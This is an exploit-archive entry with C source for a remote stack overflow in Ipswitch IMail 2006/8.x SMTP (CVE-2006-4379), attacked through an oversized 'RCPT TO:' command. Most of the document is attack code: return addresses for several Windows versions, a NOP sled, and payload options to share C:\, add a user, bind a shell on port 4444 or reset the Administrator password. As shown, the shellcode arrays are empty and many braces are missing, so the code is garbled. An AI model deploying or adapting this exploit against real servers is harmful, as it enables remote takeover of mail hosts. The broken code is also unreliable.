Ipswitch IMail Server 2006 / 8.x - 'RCPT' Remote Stack Overflow

Related Vulnerabilities: CVE-2006-4379  
Publish Date: 19 Oct 2006
Author: Greg Linares

                // IMail 2006 and 8.x SMTP Stack Overflow Exploit
// coded by Greg Linares [glinares.code[at]gmail[dot]com
// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
// This works on the following versions:
// 2006 IMail prior to 2006.1 update

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
static char overflow[1028];

// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)

/* win32_exec -  EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
unsigned char RootShare[] =

/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
unsigned char Win32Bind[] =

/* win32_adduser -  PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char AddUser[] =

/* win32_exec -  CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */
unsigned char ChangeAdmin[] =

   WSADATA wsaData;

   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   int plen, i, JMP;
   char *hostname;
   unsigned short port;

   printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n");
   printf("Coded by Greg Linares < glinares.code  [at] GMAIL [dot] com >\n");
   if (argc <= 1)
		printf("Usage: %s [hostname] [port] <Payload> <JMP>\n", argv[0]);
      	printf("Default port is 25 \r\n");
	  	printf("Payload Options: 1 = Default\n");
	  	printf("1 = Share C:\\ as 'Export' Share\n");
	  	printf("2 = Add User 'Error' with Password 'Error'\n");
	  	printf("3 = Win32 Bind CMD to Port 4444\n");
		printf("4 = Change Administrator Password to 'p@ssw0rd'\n");
	  	printf("JMP Options: 1 = Default\n");
	  	printf("1 = IMAIL 8.x SMTPDLL.DLL	   [pop ebp, ret] 0x10036f71 \n");
		printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n");
		printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n");
		printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n");
		printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n");
		printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n");
		printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n");
		printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n");


   	hostname = argv[1];
   	if (argv[2]) port = atoi(argv[2]);
   		else port = atoi("25");
   	if (argv[4]) JMP = atoi(argv[4]);
		else JMP = atoi("1");

   	if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
    	fprintf(stderr, "Error setting up with WinSock v1.1\n");

   	hp = gethostbyname(hostname);
   	if (hp == NULL)
      	printf("ERROR: Uknown host %s\n", hostname);

   	sockin.sin_family = hp->h_addrtype;
   	sockin.sin_port = htons(port);
   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
      	printf("ERROR: Socket Error\n");

   	if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
      	printf("ERROR: Connect Error\n");

   	printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);

   	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
      	printf("ERROR: Recv Error\n");

   	/* wait for SMTP service welcome*/
   	buf[bytes] = '\0';
   	check = strstr(buf, "220");
   	if (check == NULL)
      	printf("ERROR: NO  response from SMTP service\n");

   // JMP to EAX = Results in a Corrupted Stack
   // so instead we POP EBP, RET to restore pointer and then return
   // this causes code procedure to continue
   		['IMail 8.x Universal', 0x10036f71 ],
		['Windows 2003 SP1 English', 0x7c87d8af ],
		['Windows 2003 SP0 English', 0x77d5c14c ],
		['Windows XP SP2 English', 0x7c967e23 ],
		['Windows XP SP1 English', 0x71ab389c ],
		['Windows XP SP0 English', 0x71ab389c ],
		['Windows 2000 Universal English', 0x75021397 ],
		['Windows 2000 Universal French', 0x74fa1397],
		['Windows XP SP1 - SP2 German', 0x77d18c14],
   	char Exp[] = "RCPT TO: <@";						// This stores our JMP between the @ and :
   	char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:";		//Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
  	char WinXPSP2E[] = "\x23\x7e\x96\x7c:";			//WinXP SP2 English  NTDLL.DLL [pop ebp, ret] 0x7c967e23
   	char IMail815[] = "\x71\x6f\x03\x10:"; 			//IMAIL 8.15 SMTPDLL.DLL	   [pop ebp, ret] 0x10036f71
	char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:";		//Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
	char WinXPSP2[] = "\x23\x7e\x96\x7c:";			//WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
	char WinXPSP1[] = "\x9c\x38\xab\x71:";			//WinXP SP1 and 0 English U32	[pop ebp, ret]0x71ab389c
	char Win2KE[] = "\x97\x31\x02\x75:";			//Win2k English All SPs			[pop ebp, ret]0x75021397
	char Win2KF[] = "\x97\x13\xfa\x74:";			// As above except French Win2k	[pop ebp, ret]0x74fa1397
	char WinXPG[] = "\x14\x8c\xd1\x77:";			//WinXP SP1 - SP2 German U32    [pop ebp, ret]0x77d18c14

	char tail[] = "SSS>\n";							// This closes the RCPT cmd.  Any characters work.
	// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
	// After around 560 bytes or so EIP gets overwritten.  But this method is easier to exploit and it works
	// On all versions from 8.x to 2006 (9.x?)
	char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44";	// Stabolize Stack prior to payload.
   	memset(overflow, 0, 1028);
   	strcat(overflow, Exp);
	if (JMP == 1)
		printf("Using IMail 8.15 SMTDP.DLL JMP\n");
		strcat(overflow, IMail815);
	} else if (JMP == 2)
		printf("Using Win2003 SP1 NTDLL.DLL JMP\n");
		strcat(overflow, Win2k3SP1E);
	} else if (JMP == 3)
		printf("Using Win2003 SP0 USER32.DLL JMP\n");
		strcat(overflow, Win2k3SP0E);
	} else if (JMP == 4)
		printf("Using WinXP SP2 NTDLL.DLL JMP\n");
		strcat(overflow, WinXPSP2E);
	} else if (JMP == 5)
		printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n");
		strcat(overflow, WinXPSP1);
	} else if (JMP == 6)
		printf("Using Win2000 Universal English USER32.DLL JMP\n");
		strcat(overflow, Win2KE);
	} else if (JMP == 7)
		printf("Using Win2000 Universal French USER32.DLL JMP\n");
		strcat(overflow, Win2KF);
	} else if (JMP == 8)
		printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n");
		strcat(overflow, WinXPG);
	} else {
		printf("Using IMail 8.15 SMTDP.DLL JMP\n");
		strcat(overflow, IMail815);

    // Setup Payload Options
	if (atoi(argv[3]) == 1)
		printf("Using Root Share Payload\n");
		plen = 544 - ((strlen(RootShare) + strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "\x90");
		strcat(overflow, StackS);
		strcat(overflow, RootShare);

	} else if (atoi(argv[3]) == 2)
		printf("Using Add User Payload\n");
		plen = 544 - ((strlen(AddUser)+ strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "\x90");
		strcat(overflow, StackS);
		strcat(overflow, AddUser);
	} else if (atoi(argv[3]) == 3)
		printf("Using Win32 CMD Bind Payload\n");
		plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "\x90");
		strcat(overflow, StackS);
		strcat(overflow, Win32Bind);
	} else if (atoi(argv[3]) == 4)
		printf("Using Change Admin Password Payload (Pwd = 'p@ssw0rd')\n");
		plen = 544 - ((strlen(ChangeAdmin) + strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "\x90");
		strcat(overflow, StackS);
		strcat(overflow, ChangeAdmin);
	} else
		printf("Using Win32 CMD Bind Payload\n");
		plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
		for (i=0; i<plen; i++){
			strcat(overflow, "\x90");
		strcat(overflow, StackS);
		strcat(overflow, Win32Bind);

	// Dont forget to add the trailing characters to set up stack overflow
	strcat(overflow, tail);

	// Connect to SMTP Server and Setup Up Email
   	char EHLO[] = "EHLO \r\n";
   	char MF[] = "MAIL FROM <TEST@TEST> \r\n";
   	send(sockfd, EHLO, strlen(EHLO), 0);
   	send(sockfd, MF, strlen(MF), 0);

   	if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
		printf("ERROR: Send Error\n");

  	printf("Exploit Sent.....\r\n");
	if (atoi(argv[3]) == 3)
		printf("Check Shell on Port 4444\n");

	printf("Checking If Exploit Executed....\r\n");

	sockin.sin_family = hp->h_addrtype;
   	sockin.sin_port = htons(port);
   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
      	printf("ERROR: Socket Error\n");

   	if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
      	printf("Exploit Successfully Delivered!\n");
		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");
	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
      	printf("Exploit Successfully Delivered!\n");
		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");

   	/* wait for SMTP service welcome*/
   	buf[bytes] = '\0';
   	check = strstr(buf, "220");
   	if (check == NULL)
      	printf("Exploit Successfully Delivered!\n");
		printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!");

	printf("Exploit Failed: Try A different JMP Method or Payload\n");
  	exit (1);

// milw0rm.com [2006-10-19]